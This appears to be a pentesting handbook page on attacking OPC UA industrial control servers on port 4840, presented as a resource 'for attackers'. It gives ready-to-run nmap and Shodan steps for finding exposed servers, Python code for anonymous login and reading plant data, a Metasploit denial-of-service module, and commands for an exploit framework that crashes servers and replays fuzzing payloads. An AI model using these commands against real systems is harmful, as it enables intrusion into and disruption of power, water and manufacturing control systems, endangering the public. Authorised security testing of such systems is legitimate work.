OPC UA - PORT 4840

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic info

A machine-to-machine communication protocol for industrial control systems (ICS).
Standard port: 4840/TCP.
Used in:
- Manufacturing lines
- Power & energy networks
- Oil & gas
- Water plants
Provides structured data exchange between PLCs, sensors, and control software.

For attackers, this is gold: a single OPC UA server can expose device data, configurations, and control endpoints.

Enumeration

Nmap Scan

nmap -sV -p 4840 <target>

Output:

4840/tcp open  opc-ua  OPC UA TCP Protocol

Banner Grab & Enumeration

Use the opcua-info NSE script:

nmap -p 4840 --script opcua-info <target>

This extracts:

Server application name
Security policies supported (None, Basic256, etc.)
Endpoints & available services

To reveal security issues in OPC UA servers, scan it with OpalOPC.

opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port

Shodan / Censys

Search for:

port:4840 opc ua

Exploitation

Once you find an OPC UA server, you have multiple attack routes:

Many deployments allow anonymous access. Use the Python opcua client:

from opcua import Client

client = Client("opc.tcp://<target>:4840")
client.connect()
print("Connected:", client.get_endpoints())

2. Information Disclosure

OPC UA servers expose tags, variables, and node data. This can reveal:

Factory layout
Device models & firmware versions
Process values (temperatures, flow rates, etc.)

Example Python snippet:

root = client.get_root_node()
print("Root children:", root.get_children())

3. Vulnerabilities (CVE-2018-4840 & more)

Poor implementations of OPC UA are vulnerable to buffer overflows and denial of service.

Metasploit has a module:

use auxiliary/dos/opcua/opcua_extensionobject_bof
set RHOSTS <target>
set RPORT 4840
run

This can crash or prove exploitability in vulnerable stacks. With ROP chains, it becomes RCE.

Automated Tools

Claroty’s OPC UA Exploit Framework is a research toolkit for fuzzing, testing, and exploiting OPC UA servers/clients. It was the backbone of Team82’s discovery of dozens of OPC UA vulnerabilities.

Installation & How to guide

# Clone the repo
git clone https://github.com/claroty/opcua-exploit-framework.git
cd opcua-exploit-framework

# Install requirements
pip install -r requirements.txt

⚠️ Make sure you’re running Python 3.8+ and have pip installed.

The framework has four modules:

sanity → Simple probes
attacks → Exploit payloads
corpus → Saved fuzz cases
server → Fake OPC UA server for testing

1. Run a Sanity Test (check target is alive)

python3 main.py sanity --target opc.tcp://192.168.1.100:4840

This checks if the OPC UA service is responding.

2. Enumerate Nodes

python3 main.py sanity read-nodes --target opc.tcp://192.168.1.100:4840

Useful for info-gathering on exposed objects.

3. Launch an Attack

Example: Remote Stack Overflow (DoS)

python3 main.py attacks dos-basic --target opc.tcp://192.168.1.100:4840

If the server crashes → it’s vulnerable.

4. Reuse Payloads (Corpus)

python3 main.py corpus --payload payloads/bad_integer.bin --target opc.tcp://192.168.1.100:4840

This lets you replay fuzzing payloads that previously triggered bugs.

5. Use the Built-in Test Server

python3 main.py server --port 4840

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousCisco Smart Install - PORT 4786 NextDocker Registry - PORT 5000

Last updated 4 months ago

hashtagBasic info

hashtagEnumeration

hashtagNmap Scan

hashtagShodan / Censys

hashtagExploitation

hashtag1. No Authentication (Anonymous Login)

hashtag2. Information Disclosure

hashtag3. Vulnerabilities (CVE-2018-4840 & more)

hashtagAutomated Tools

hashtagInstallation & How to guide

hashtag1. Run a Sanity Test (check target is alive)

hashtag2. Enumerate Nodes

hashtag3. Launch an Attack

hashtag4. Reuse Payloads (Corpus)

hashtag5. Use the Built-in Test Server